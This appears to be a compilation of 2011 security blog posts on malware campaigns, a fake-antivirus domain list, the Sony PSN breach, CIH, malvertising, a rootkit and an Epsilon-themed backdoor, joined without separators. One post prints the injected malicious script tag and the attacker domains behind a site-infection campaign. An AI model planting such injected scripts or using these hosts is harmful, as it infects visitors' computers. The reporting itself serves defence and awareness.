diagnostic-scanner-xp-protection.com
diagnosticscannerxpprotection.com
digitalscannerprotectionfast.com
digitalscannerprotectionfree.com
digitalscannerwinprotection.com
digital-scanner-xp-protection.com
digitalscannerxpprotection.com
documentscannerprotectionfast.com
documentscannerprotectionfree.com
documentscannerwinprotection.com
document-scanner-xp-protection.com
documentscannerxpprotection.com
imagescannerprotectionfast.com
imagescannerprotectionfree.com
imagescannerwinprotection.com
image-scanner-xp-protection.com
imagescannerxpprotection.com
laserscanantivfree.com
liverscanantivfree.com
lungscanantivfree.com
memoryscannerprotectionfast.com
memoryscannerprotectionfree.com
memoryscannerwinprotection.com
memory-scanner-xp-protection.com
memoryscannerxpprotection.com
mobilescannerprotectionfree.com
mobilescannerwinprotection.com
mobile-scanner-xp-protection.com
mobilescannerxpprotection.com
negativescannerprotectionfree.com
negativescannerwinprotection.com
negative-scanner-xp-protection.com
negativescannerxpprotection.com
photoscannerprotectionfast.com
photoscannerprotectionfree.com
photoscannerwinprotection.com
photoscannerxpprotection.com
portablescannerprotectionfree.com
portablescannerwinprotection.com
portablescannerxpprotection.com
portscannerprotectionfree.com
portscannerwinprotection.com
portscannerxpprotection.com
printerscannerprotectionfree.com
printerscannerwinprotection.com
printerscannerxpprotection.com
progressivescanantivfree.com
protectinstantwinscanner.com
protectionboostxpscanner.com
protectioninstantwinscanner.com
protectionmicrosoftxpscanner.com
protectionsafexpscanner.com
protectionwinscan.com
protectionwinscanneralbum.com
protectionwinscanner.com
protectionwinscannerdefinition.com
protectionwinscannerdriver.com
protectwinscanneralbum.com
protect-win-scanner.com
protectwinscanner.com
protectwinscannerdefinition.com
protectwinscannerdriver.com
protectwinscannerdrivers.com
protectwinscannerfeatures.com
protectwinscannerglass.com
protectwinscannerguide.com
protectwinscannerhardware.com
protectwinscannerinterface.com
protectwinscannermaintenance.com
protectwinscannermanufacturer.com
protectwinscannermanufacturers.com
protectwinscannermaster.com
protectwinscannermodels.com
protectwinscannerprofile.com
protectwinscannerprogramming.com
quickscanantivfree.com
quickscanantivwin.com
scanadamantivfree.com
scanantbiteivfree.com
scanantcolonyivfree.com
scanantfarmivfree.com
scanantivfree.com
scanantivirusvwin.com
scanantivwcarsin.com
scanantivwdealerin.com
scanantivwdealersin.com
scanantivwdriversin.com
scanantivwenginesin.com
scanantivwgolfin.com
scanantivwin.com
scanantivwinfoin.com
scanantivwmodelsin.com
scanantivwstorein.com
scanantivwtrucksin.com
scanantivxp.com
scanaquilanerantv.com
scanbandieranerantv.com
scanborsanerantv.com
scancronacanerantv.com
scandolcenerantv.com
scan-er-antivn-oew.com
scan-er-antivnoew.com
scan-eranti-vn-oew.com
scan-eranti-vnoew.com
scan-erantivn-oew.com
scan-erantivnoew.com
scanfiumenerantv.com
scanforestanerantv.com
scanfreccianerantv.com
scanguardianerantv.com
scanner-ant-farm-iv-xp.com
scanneranthillsivxp.com
scanner-ant-iv-xp.com
scannerantlionivxp.com
scannerantv.com
scannerblueantivxp.com
scannerprotectiondogsfree.com
scannerprotectionexpertsfree.com
scannerprotectionfactorfree.com
scannerprotectionfast.com
scannerprotectionfilterfree.com
scannerprotectionfree.com
scannerprotectionfunctionsfree.com
scannerprotectionkansasfree.com
scannerprotectionmeasurefree.com
scannerprotectionmethodsfree.com
scannerprotectionofficesfree.com
scannerqueenantivxp.com
scannerwingamesprotection.com
scanner-win-protection.com
scannerwinprotection.com
scanner-win-stuff-protection.com
scannerwinstuffprotection.com
scannerxpdesktopprotection.com
scannerxpdriversprotection.com
scannerxpinstallationprotection.com
scannerxppracticesprotection.com
scannerxpprotection.com
scannerxprepairprotection.com
scannerxpstyleprotection.com
scannerxpthemesprotection.com
searchableantiv.com
slidescannerantivxp.com
slidescannerwinprotection.com
thescannerantiv.com
virus-scanner-win-protection.com

We are seeing WordPress and Joomla sites infected with this malware but attackers are certainly scanning for ANY type of target. So if you have a web site, make sure it is updated, you are using good passwords, etc ,etc (the normal guidelines).

We will post more details are we track them. If you have any question, let us know. If you need help with this type of malware, we are here to assist.

Users of Sony’s PlayStation Network are at risk of identity theft after hackers broke into the system, and accessed the personal information of videogame players.

The implications of the hack, which resulted in the service being offline since last week, are only now becoming clear as Sony has confirmed that the hackers, who broke into the system between April 17th and April 19th, were able to access the personal data of online gamers.

In a blog post, Sony warns that hackers have been able to access a variety of personal information belonging to users including:

* Name
* Address (city, state, zip code)
* Country
* Email address
* Date of birth
* PlayStation Network/Qriocity password and login
* Handle/PSN online ID

In addition, Sony warns that profile information – such as your history of past purchases and billing address, as well as the “secret answers” you may have given Sony for password security may also have been obtained.

As if that wasn’t bad enough, Sony admits that it cannot rule out the possibility that credit card information may also have been compromised:

While there is no evidence at this time that credit card data was taken, we cannot rule out the possibility. If you have provided your credit card data through PlayStation Network or Qriocity, out of an abundance of caution we are advising you that your credit card number (excluding security code) and expiration date may have been obtained.

The fact that credit card details, used on the network to buy games, movies and music, may also have been stolen is obviously very worrying, and affected users would be wise to keep a keen eye on their credit card statements for unexpected transactions. Questions clearly have to be asked as to whether Sony was ignorant of PCI data security standards and storing this and other personal data in an unencrypted format.

So how could hackers exploit the information stolen from the Sony PlayStation Network?

1. Break into your other online accounts. We know that many people use the same password on multiple websites. So if your password was stolen from the Sony PlayStation Network, it could then be used to unlock many other online accounts – and potentially cause a bigger problem for you.

So you should always use unique passwords.

(Enjoy this video? You can check out more on the SophosLabs YouTube channel and subscribe if you like)

Oh, and you better be sure that you have changed your “secret answers” too.

2. Email you phishing scams or malware attacks. If they stole your email address from Sony, they can now email you. And it wouldn’t be difficult for the cybercriminals to create an email which pretended to be a legitimate organisation (perhaps Sony themselves?) to steal more information or carried a Trojan horse designed to infect your computer. The fact that they know your name and snail-mail address could make the email even more convincing.

3. Hit you in the wallet. If your credit card details have been exposed by the Sony PlayStation Network hack then you could find fraudsters begin to make purchases from your account – if you notice that money is missing, you’ll have to go through the rigmarole of claiming the money back from your credit card company.

This security breach is not just a public relations disaster for Sony, it’s a very real danger for its many users.

If you’re a user of Sony’s PlayStation Network now isn’t the time to sit back on your sofa and do nothing. You need to act now to minimise the chances that your identity and bank account becomes a casualty following this hack.

That means, changing your passwords, auditing your other accounts, and considering whether you should keep a closer eye on those credit card statements or simply telling your bank that as far as you’re concerned the card is now compromised.

More information can be found in Sony’s blog post.

The Love Bug. I LOVE YOU. LoveLetter. All different names for one of the world’s most famous viruses, which spread around the globe in May 2000, infecting millions of computers and clogging up email systems.

If you have an interest in IT and were around at the time, you’ll surely remember it. But if you don’t, you can quickly catch up by checking out my memories of those crazy days.

So what can possibly be new to say about the Love Bug? Well, on Friday a movie inspired by the malware will be getting its world premiere.

I first wrote about “Subject: I Love You” way back in November 2008, but now it’s finally seeing the light of day – at 5pm on Friday 30th April, at the Newport Beach Film Festival in California.

And here is its trailer:

It certainly looks professionally done, and has some not entirely unfamiliar actors (Briana Evigan plays the female lead, ex-Superman Dean Cain has a role, and True Blood’s Kristin Bauer also features).

Want more information about the movie? Here’s the promotional puff:

This action-packed romantic drama is based on the destructive ‘I Love You’ computer virus. This virus spread around the globe at the turn of the millennium, shutting down computer systems at the Pentagon, Parliament and the CIA. For Victor he will do anything to reconnect with the only woman he’s ever loved – even if that means entangling himself in an international criminal investigation. Never have the words “I love you” almost ruined the world.

It sounds like your usual story of “Boy meets girl. Loses girl. Writes computer virus to infect millions of computers around the world to tell girl he loves her. Gets girl.” Nothing out the ordinary there then..

Inspired by true events? Hmm.. well, not with the greatest precision. The real Love Bug wasn’t written to impress a girl, but instead attempted to steal internet passwords. One wonders also if the film’s producers will engage in any err.. viral marketing to promote it.

I don’t want to come across as too much of a fuddy-duddy, but let’s hope the movie doesn’t glorify too much the creation of malware. Even in the days of the Love Bug it was a problem which could have a serious impact on businesses and home users.

If you’re able to get to the movie premiere and see “Subject: I Love You” why not leave a comment with your review of the film?

Today is the 25th anniversary of the explosion at the Chernobyl nuclear power plant, which resulted in the world’s worst nuclear accident.

Vigils have been held to commemorate the disaster, where an explosion and fire released a large cloud of radioactive contamination into the air, spreading over much of Western Russia and Europe.

No doubt the anniversary has extra resonance following recent events in Japan, at the Fukushima nuclear plant.

However, the relevance of today’s date for Naked Security is the virus that bear’s Chernobyl’s name.

The CIH virus, also known as Chernobyl, was first discovered in 1998, and quickly became one of the most commonly encountered viruses in the wild.

Although never as widespread as other malware of the time such as the Melissa virus, the appearance of a number of magazine cover CDs, with programs infected with CIH, no doubt assisted its wide distribution.

But it was CIH’s payload which created the biggest cause for concern.

CIH was dubbed “Chernobyl” by the media because it was programmed to activate its destructive payload on the anniversary of the Chernobyl reactor meltdown – 26th April – wiping data from victims’ hard drives and overwriting the computer’s BIOS chip, making the computer unusable.

For the first time ever, we had encountered a virus which – if it had activated its payload – required a hardware fix. If you were unlucky enough to have your BIOS chip wiped, the Chernobyl virus had effectively turned your computer into a useless lump of plastic – the only way to get your PC working again was to open it up and replace the chip.

And don’t forget – on some computers, the BIOS chip wasn’t removable, and so it could only be replaced by swapping the entire motherboard.

For such a destructive computer virus to be so prevalent, and with April 26th 1999 approaching, was a real cause for concern. And in Asia it was reported to hit particularly hard.

For instance, South Korean government reports claimed that the Chernobyl virus caused $250 million damage, infecting a quarter of a million computers.

So who wrote the Chernobyl virus, and why?

The first point to bear in mind is that there’s no suggestion that the author of the virus intended it to be called “Chernobyl”. That was a name dreamt up purely because of the coincidence of the virus’s payload activation date, rather like the infamous Michelangelo virus was also given that name because it happened to be programmed to trigger on the anniversary of the artist’s birth.

In fact, many in the anti-virus community chose to call the virus by another name – CIH. This name was chosen from a plaintext string inside the virus’s code:

CIH v1.2 TTIT

The Chernobyl name stuck, of course, and helped to fuel headlines about the virus and its particularly devastating payload. Little did we know that the phrase “CIH v1.2 TTIT” would help identify the virus’s author, but also where it had been created.

On April 30, 1999, four days after the virus’s damaging payload disrupted computers around the world, Taiwanese police announced that they were questioning 24 year-old Chen Ing Hau about the virus.

Former classmates at Taipei’s Tatung Institute of Technology said that Chen had boasted of creating the virus, and warned them not to allow their computers to become infected.

I’ll spell it out, in case you haven’t twigged yet:

Chen Ing Hau = CIH
Taipei Tatung Institute of Technology = TTIT

The Taiwanese authorities, it seemed, had got their man and it looked likely that Chen Ing Hau would be punished.

But the story doesn’t end there. Because – astonishingly – although the virus had caused serious levels of damage to computers in many countries no-one appeared to have filed a complaint in Taiwan. And without any local victims coming forward, Chen Ing Hau seemed to have got away with it.

Chen subsequently won a job at a software company on the back of his infamy.

It wasn’t until almost 18 months later, in September 2000, that a Taiwanese student reported his computer had been hit by the virus and Chen Ing Hau was finally detained.

However, as far as I have been able to determine (and I would love to hear if anyone has further information), Chen escaped with a reprimand and was never fined or imprisoned for the CIH virus he created.

Indeed, he appears to have repented for his past misdemeanours and a quick Google discovers that he has been giving talks at technology conferences such as FreedomHEC Taipei in 2009.

Here’s a photograph of Chen speaking at that conference, in front of a large screen of code discussing how Linux drivers can be reverse engineered.

I wonder if he still signs his code “CIH”?

Viruses like CIH/Chernobyl were becoming a rarity even in the late 1990s. More and more malware authors were turning their backs on destructive payloads, and implementing sneakier forms of attack instead.

As making money, rather than wanton destruction, became the primary motivation for malware authors so cybercriminals realised that attacks which drew attention to themselves with dramatic payloads would work against their plans of stealing information from compromised PCs.

Iranian officials today claimed to have intercepted a cyberwarfare attack, involving malware designed to spy upon government systems.

The malware has been dubbed the “Stars” virus by Gholamreza Jalali, the head of Iran’s civil defence organisation, who broke the news on the institution’s website.

Jalali says that the Stars virus continues to be investigated by the country’s experts, and that it could have been “mistaken for executive files of governmental organisations”. That suggests that the attack may have been disguised as a legitimate Word, PDF file or similar document in an attempt to trick unsuspecting victims into infecting government computers.

Inevitably, many people will remember the brouhaha that surrounded the Stuxnet virus last year, and sure enough the media has jumped upon the story of the new Stars virus.

Unfortunately, we can’t tell you much about this Stars virus. As far as we know, we don’t have a sample in our malware collection – and we would really need the Iranian authorities to share what they have seen with the anti-malware community, so we can delve a little deeper.

An MD5 checksum, for instance, would quickly help us ascertain if this is a sample of some malware that we’ve seen before.

In his statement, Jalali blamed American and Israeli forces for attacking Iranian websites, but we are not able to confirm that the malware attack – if genuine – originated in either country or if it is really specifically targeting Iranian systems.

Let’s not forget, we see almost 100,000 new unique malware samples every day – much of it designed to spy upon victims’ computers. Presumably the Iranian authorities have reason to believe that the Stars virus they have intercepted was specifically written to steal information from their computers, and is not just yet another piece of spyware.

If we learn any more we’ll certainly let you know.

In our previous FAKEAV whitepaper, we presented how Trend Micro researchers tracked down the evolution of FAKEAV and classified its development, behavior-wise, according to generations. One of the early generations listed in the paper can be recalled as the DLL-based FAKEAV (4th Generation) – a FAKEAV group that uses a DLL file to perform all the malicious routines, primarily to avoid being terminated easily. A few months ago, however, we saw this particular generation again making its rounds in the wild, one of which we detect as TROJ_FAKEAV.BTV.

In terms of appearance, 4th generation FAKEAV does not have any particular difference from other FAKEAV generations. However, in the background, can be characterized with the considerably big file size of the DLL component (samples of TROJ_FAKEAV.BTV are around 1.50MB in size). This is because the fake pop-ups, GUIs, and other scareware modules are all contained in the DLL.

FAKEAV as a Whole

Understanding how FAKEAV progressed over the years, it isn’t particularly surprising to see variants of 4th Generation FAKEAV back in the wild. For the most part we see them updating visually, rather than evolving technically. The bad guys knew that all it takes to maintain their steady supply of victims is to update the (rogue) antivirus software name and do some re-designing in their GUIs – a reason why we see so many FAKEAV GUIs today.

In parallel with these software name updates, FAKEAV also updates its registry, file, and folder names in order to evade string-based AV solutions. Nevertheless regardless of how they update, strings will continue to be a weak point of the FAKEAV family. From it, antivirus researchers can craft generic rules/patterns for memory, process, file, and registry scanning/cleaning.

As such, we will continue to devote our time and effort to closely monitor prominent threats like the FAKEAV family, as well as provide adequate solutions to users. We advise users to keep themselves informed of the developments concerning threats such as FAKEAV, as well as to familiarize themselves with the nature of attacks. Users may refer to the guide we published last year, FAKEAV 101: How To Tell If Your Antivirus Is Fake.

Also,more information on the 4th Generation FAKEAV, as well as the other generations, is available in our report, The Dangers Rogue Antivirus Threats Pose.

We first detected malware from globalpoweringgathering.com almost a month ago, and posted on our blog about it. But just on the last few days, we started to see a big increase in the number of sites infected with it.

We were able to catalog a find almost 3 thousand sites with this malware and Google lists almost 2 thousand sites in their safe browsing page (and it is growing each day – just yesterday it was less than 1 thousand):

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 1815 domain(s), including clonestop.com/, warseer.com/, showbiz411.com/.

On our original post, we explained about this malware, which was injecting an encoded javascript directly in the WordPress database. However, on the latest infections, we are seeing the following code added direclty to the HTML or PHP files (with no obfuscation):

<script src=”http://globalpoweringgathering.com/in.php?n=15″..

With some variations, with just a number changing:

http://globalpoweringgathering.com/in.php?n=15

http://globalpoweringgathering.com/in.php?n=25

http://globalpoweringgathering.com/in.php?n=2

http://globalpoweringgathering.com/in.php?n=9

Note that this is a very similar from the “Hilary Kneber” malware distributed by these domains (hosted on the same IP addresses):

globalpoweringgathering.com
lessthenaminutehandle.com
lessthenaseconddeal.com
welcometotheglobalisnet.com

How are these sites getting hacked?

We are seeing multiple causes. The most common was related the usage of old versions of web applications (like WordPress, Joomla, etc). However, we are also seeing HTML-only sites hacked that got compromised via FTP due to stolen passwords. So make sure your sites are updated and change your passwords (making sure to use a strong password, that your desktop is not compromised, etc).

Other domains being used as intermediaries:

543ge.cz.cc
gtrregrw.cz.cc
leased-ltx.cz.cc
legacy-tools.cz.cc
notyfiwgt.co.cc
rthlsinks.cz.cc
sajko.co.cc
upsreleased.cz.cc
wretery.cz.cc
avi7o.co.cc
tempviews.cz.cc
viables.cz.cc

If you need any help cleaning up an infected site (or someone to do it for you), let us know.

Earlier the other day, I was browsing through the Yahoo! PH site and the Yahoo! Purple Hunt 2.0 ad caught my attention.

Curious as I am, I clicked on the ad and surprisingly my browser downloaded a suspicious file named com.com.

Apparently this ad redirected me to a randomly generated URL similar to the following which, unfortunately, led to the malicious download:

• hxxp://want6.{BLOCKED}.com/se/3da19bea8f9c03e96c9b1acad9cce5a88a2244f0a34d69
  c09b8d3198b2797726789be0228c0df3c762ed088a2327b07f4a183fa6fa753b0acfd7f0afc2d2b
  13b801ba978269fcda413f53e/960b0a2a/com.com
• hxxp://nose8.{BLOCKED}.com/se/3da19bea8f9c03e96c9b1acad9cce5a88a2244f0a34d69c
  09b8d3198b2797726789be0228c0df3c762ed088a2327b07f4a183fa6fa753b0acfd7f0afc2d2b
  13b801ba978269fcda413f53e/960b0a2a/com.com
• hxxp://letter6.{BLOCKED}.com/se/3da19bea8f9c03e96c9b1acad9cce5a88a2244f0a34d69c0
  9b8d3198b2797726789be0228c0f3c762ed088a2327b07f4a183fa6fa753b0acfd7f0afc2d2b13
  b801ba978269fcda413f53e/785c08d8/com.com

Below is a screenshot of the file download dialog box:

The downloaded file is detected by Trend Micro as TSPY_PIRMINAY.A. Let’s see how the download took place.

Firstly, the download only happens once per browser, which means that the malvertisement may have used an IP and user agent filtering of some sort to prevent multiple downloads which would make it suspicious to the end user.

To be able to replicate the malware download from the compromised ad, we used a browser extension which spoofs browser user agents, instead of installing different browsers.

It appears that the advertisement is first redirected to the malware download before it finally brings the browser to the real advertisement page. The redirection follows this format for the download link:

http://{varying string}{random number}.{varying domain}/se/{constant string or guid}/com.com

We’d like to thank the guys over at Yahoo! Ad Security Ops for acting swiftly on our initial report, taking down the malvertisement so it could no longer harm unsuspecting users.

Some time ago a new rootkit appeared which at first glance seemed more similar to initial variants of TDL3 than to the updated TDL4 variants we have seen this year. Like TDL3 it also parasitically infected a driver by inserting code in the resource directory of the PE file. In this case the name of the file it infected was hard coded to volsnap.sys. Also similar to the early variants of TDL3, this rootkit also hooked some pointers in the dispatch table (IRP hook) of the driver below disk on the device stack of hard-disk.

But it was very interesting to see some of the anti-rootkit tools not showing the dispatch table hooks which are usually pretty straightforward to identify. Also this malware would not allow an external debugger (WinDbg) to break, which was annoying.

The reason for hooks not being reported was that the memory being read by the tools was not the actual memory! The dispatch table as ‘seen’ by the tools was not hooked whereas in reality it was hooked. The part that made it interesting was that the memory was being read at the correct address with a mov instruction and not using some system API that could be hooked. We know of some proof-of-concept ways to achieve this but I had not seen this behavior from a threat in-the-wild before.

Obviously the motivation for malware authors to use such techniques is to prevent tools for showing their hooks so that administrators are not alarmed of suspicious activity.

So how does it fake memory on read access? This rootkit is using hardware breakpoints (DRX register setting) to monitor access to memory areas of kernel that it patches. In addition to modifying the DR0 register it hooks the KiDebugRoutine pointer so that it gets notification when the hardware breakpoint is encountered due to memory access. This rootkit installs IRP hooks and sets DR0 register to the memory address where the IRP hook is installed. So when the memory of the dispatch table is read, a ‘fake’ image with no hook in it is presented by the malware’s KiDebugRoutine hook.  Following is a brief overview of the KiDebugRoutine hook code.

This is the beginning of the malware’s KiDebugRoutine handler code. If it encounters a breakpoint then the malware simply increments the instruction pointer for the thread where exception occurred and returns as handled otherwise we take the jump.

KiDebugRoutine Handler – Snippet 1

Following is the target from the above jump (loc_403BCC). If the exception occurred at a kernel mode address then this jump to loc_404026 is taken.

KiDebugRoutine Handler – Snippet 2

At the target of the above jump, firstly the exception is processed normally by checking access flags, clearing the DR6 register etc. And then the following code is used to identify if this is a read access to the protected memory and if the malware wants to block this particular access. If both of these conditions are true then the read location is altered to point to a memory area with contents the malware wants to forge. Thus anyone who the malware does not like ends up reading wrong memory. The comments in the code below explain the details. The assumption about ESI in code below is interesting.

KiDebugRoutine Handler – Snippet 3

This technique had been discussed before and this example just shows again how modern rootkits are adopting techniques and evolving rapidly. In fact, after this malware we have seen yet another update in the MBR infecting TDL4 strain which is still using DKOM to put a  ‘fake’ device object on the device stack of hard-disk. We continue to investigate and provide protection against such threats.

We were recently made aware of attacks leveraging the recent data breach that involved Epsilon.

According to reports, the attack involves a web page that looks very similar to the press release issued by Epsilon concerning the breach incident. The page also instructs the recipient to click a link at the bottom of the post, in order to download and run a tool that will supposedly help them determine if their personal information was among those disclosed during the attack.

We were able to analyze the details of the attack, and found that the link  downloads an .EXE file which is now detected as TROJ_MSPOSER.ASM. Running TROJ_MSPOSER.ASM displays the following GUI, which seems to suggest that some checking is being done on the system:

But of course, the graphic is really just there in attempt to convince the victim that what they downloaded was really a tool that will help them determine if their information is still secure. What is really happening in the background is that another malicious file is being installed into the system.

The installed malicious file is a backdoor now detected as BKDR_MSPOSER.KAX. Analyzing this file, we found out that it executes a rather long list of commands, which are mostly related to gathering information about the victim. The executed commands include:

• Log keystrokes
• Send Emails
• Capture Screenshots
• Capture Web camera
• Record Sounds using microphone
• Manipulate system sound volume
• Open Webpages
• Manipulate Files
• Download/Upload files
• Create/Remove directories
• Enumerate Network Adapters
• Execute DOS Command
• Execute Arbitrary Commands
• Get Access Control List Information
• Get IP Configuration Settings
• Get System Information (Computer Name, Manufacturer, Model, Operating System, System Type, Memory)
• Get User name and password
• List/Start/Kill Processes
• Start/Stop Services
• List Drives
• List SQL Servers
• Execute Netstat
• Execute WMI commands
• Read/Write/Delete registry values
• Update itself
• Remove itself
• Get Certificates

By simply looking at the list, it looks like the cybercriminal(s) behind this attack is aiming to gather a great deal of information from its victims – probably even more than what was taken by those who breached Epsilon’s email system.

As of this writing, Epsilon has not released any kind of tool that will do what the malware in this attack is claiming to do, and will unlikely do so. Users who were possibly affected by the breach were already informed of the incident through emails.

We advise users who receive information about the existence of such a tool – regardless of medium – are strongly recommended to ignore them. We’ve already provided protection to Trend Micro users by blocking the related IP, as well as detecting the malicious files.

We are getting reports that the CBS Money Watch and some ZDNet web sites are currently distributing malware and blacklisted by Google. We are still investigating it, but if you try to visit the CBS Money watch site (moneywatch.com), you will get a warning from Google:

What is the current listing status for moneywatch.bnet.com/investing?

Site is listed as suspicious – visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 2 time(s) over the past 90 days.

What is interesting is the web site being used to distribute the malware (zdnet.com – i.zdnet.com):

Of the 142 pages we tested on the site over the past 90 days, 76 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-04-19, and the last time suspicious content was found on this site was on 2011-04-19.

Malicious software includes 130 exploit(s).

Malicious software is hosted on 1 domain(s), including zdnet.com/.

If we check the diagnostic page for zdnet.com, it also says the following:

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 5 domain(s), including bnet.com/, smartplanet.com/, findarticles.com/.

So something is definitely going on there. We will post more details as we investigate this issue.